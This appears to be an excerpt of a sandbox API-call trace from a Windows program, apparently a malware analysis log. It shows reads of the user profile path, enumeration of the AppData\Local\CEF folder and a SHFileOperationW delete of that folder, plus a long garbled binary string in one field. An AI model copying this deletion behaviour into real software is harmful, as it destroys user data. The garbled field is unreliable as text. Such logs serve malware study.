CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0154.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0154.653] CryptReleaseContext (hProv=0x9beef0, dwFlags=0x0) returned 1 [0154.653] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.653] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.653] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.653] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.654] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.654] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0154.654] FreeLibrary (hLibModule=0x76390000) returned 1 [0154.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.654] CloseHandle (hObject=0x4a4) returned 1 [0154.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.655] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.655] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.655] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.655] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/CEF", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpFilePart=0x8cedf4*="CEF") returned 0x21 [0154.655] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\CEF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\cef")) returned 0x10 [0154.655] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\CEF\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1e38 [0154.655] FindNextFileW (in: hFindFile=0x9e1e38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0154.655] FindNextFileW (in: hFindFile=0x9e1e38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0154.655] FindNextFileW (in: hFindFile=0x9e1e38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 0 [0154.655] FindClose (in: hFindFile=0x9e1e38 | out: hFindFile=0x9e1e38) returned 1 [0154.656] GetLastError () returned 0x12 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0154.656] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0154.656] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0154.656] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0154.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0154.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0154.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0154.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0154.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0154.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5d660 [0154.658] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/CEF", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpFilePart=0x8cf650*="CEF") returned 0x21 [0154.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0154.658] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\CEF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\cef")) returned 0x10 [0154.658] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄